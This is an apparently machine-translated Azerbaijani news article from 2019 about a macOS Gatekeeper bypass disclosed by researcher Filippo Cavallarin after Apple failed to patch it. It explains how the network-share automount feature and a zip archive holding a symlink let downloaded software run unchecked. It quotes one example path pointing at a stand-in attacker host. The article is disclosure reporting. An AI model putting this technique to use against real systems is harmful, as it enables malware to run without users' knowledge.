Mac-da zərərli proqramı quraşdırmaq asandır. Apple üç aydan sonra belə səhvi aradan qaldırmadı

27. 5. 2019

Təhlükəsizlik tədqiqatçısı Filippo Kavallarin öz bloqunda macOS 10.14.5-də səhvlə bağlı xəbərdarlıq dərc edib. Bu, Gatekeeper-in təhlükəsizlik tədbirlərindən tamamilə yan keçmək imkanından ibarətdir. Cavallarin sözlərinə görə, o, artıq bu ilin fevralında Apple-a xətanı göstərib, lakin şirkət onu son yeniləmədə düzəltməyib.

Gatekeeper Apple tərəfindən hazırlanıb və ilk dəfə 2012-ci ildə onun masaüstü əməliyyat sisteminə daxil edilib. Bu, istifadəçinin xəbəri və razılığı olmadan proqramın işləməsinin qarşısını alan mexanizmdir. Siz proqramı endirdikdən sonra Gatekeeper proqram təminatının Apple tərəfindən düzgün imzalanıb-imzalanmadığını yoxlamaq üçün avtomatik olaraq onun kodunu yoxlayır.

Bloq yazısında Cavallarin bildirir ki, Gatekeeper standart olaraq həm xarici yaddaşı, həm də şəbəkə paylaşımlarını təhlükəsiz yerlər hesab edir. Bu hədəflərdə olan hər hansı proqram, Qapıçı yoxlamasından keçmədən avtomatik olaraq işə salına bilər. Məhz bu xüsusiyyət istifadəçinin xəbəri olmadan zərərli proqram təminatını işə salmaq üçün istifadə edilə bilər.

İcazəsiz girişə icazə verən aspektlərdən biri istifadəçilərə sadəcə "/net/" ilə başlayan yolu göstərərək şəbəkə paylaşımını avtomatik quraşdırmaq imkanı verən avtomatik quraşdırma funksiyasıdır. Nümunə olaraq, Cavallarin "ls /net/evil-attacker.com/sharedfolder/" yolunu göstərir ki, bu da əməliyyat sisteminin potensial zərərli ola biləcək uzaq bir yerə "sharefolder" qovluğunun məzmununu yükləməsinə səbəb ola bilər.

Videoda təhlükənin necə işlədiyini izləyə bilərsiniz:

Başqa bir amil odur ki, əgər automount funksiyasına aparan xüsusi simvolik keçidi ehtiva edən zip arxivi paylaşılarsa, o, Gatekeeper tərəfindən yoxlanılmayacaq. Beləliklə, qurban zərərli arxivi asanlıqla yükləyə və onu aça bilər ki, bu da təcavüzkarın istifadəçinin xəbəri olmadan Mac-da praktiki olaraq istənilən proqram təminatını işə salmağa imkan verir. Defolt olaraq müəyyən genişləndirmələri gizlədən Finder də bu zəiflikdə öz payına malikdir.

Cavallarin öz bloqunda qeyd edir ki, Apple bu ilin fevralın 22-də macOS əməliyyat sisteminin zəifliyinə diqqət çəkib. Lakin mayın ortalarında Apple Cavallarin ilə əlaqəni dayandırdı, buna görə də Cavallarin hər şeyi ictimaiyyətə açıqlamaq qərarına gəldi.

Mənbə: FCVL

Mövzular: saxlama, avtomatik, MacOS, video, Ayarlar, funksiyası, istifadəçi, Tətbiq, alma

Məqalənin müzakirəsi

Adınız

Sizin şərhiniz

Yuxarıdakı məlumatları doldurmaqla, mən təsdiq edirəm ki, TEXT FACTORY s.r.o., Brno şəhərində qeydiyyatda olan ofis, Durďákova 336/29, Černá Pole, Poçt kodu: 613 00, ID nömrəsi: 06157831, Brno Regional Məhkəməsində qeydiyyatdan keçmişdir, C bölməsi , 100399-u daxil edin, 6-cı maddənin 1-ci bəndinə uyğun olaraq TEXT FACTORY s.r.o.-nun qanuni maraqları əsasında mənim tərəfimdən doldurulmuş qeydiyyat formasında təqdim olunan şəxsi məlumatlarımı emal edəcək. f) GDPR və qanuni öhdəlikləri yerinə yetirmək üçün (Maddə 6, 1, c) GDPR), aşağıdakı məqsədlər üçün: TEXT FACTORY s.r.o. tərəfindən idarə olunan veb-saytların ziyarətçilərinə dərc edilmiş məqalələrə və ya müzakirələrə fəal töhfə vermək üçün icazənin təmin edilməsi zərurəti forumlar və bu müzakirə forumlarının administratoru kimi TEXT FACTORY s.r.o.-nun hüquqlarını həyata keçirmək. Şəxsi məlumatların və hüquqların emalı haqqında ətraflı məlumatı burada tapa bilərsiniz Fərdi məlumatların qorunması üzrə dərslər. bütün mətn

Ola bilər sizi maraqlandırır

Əlaqədar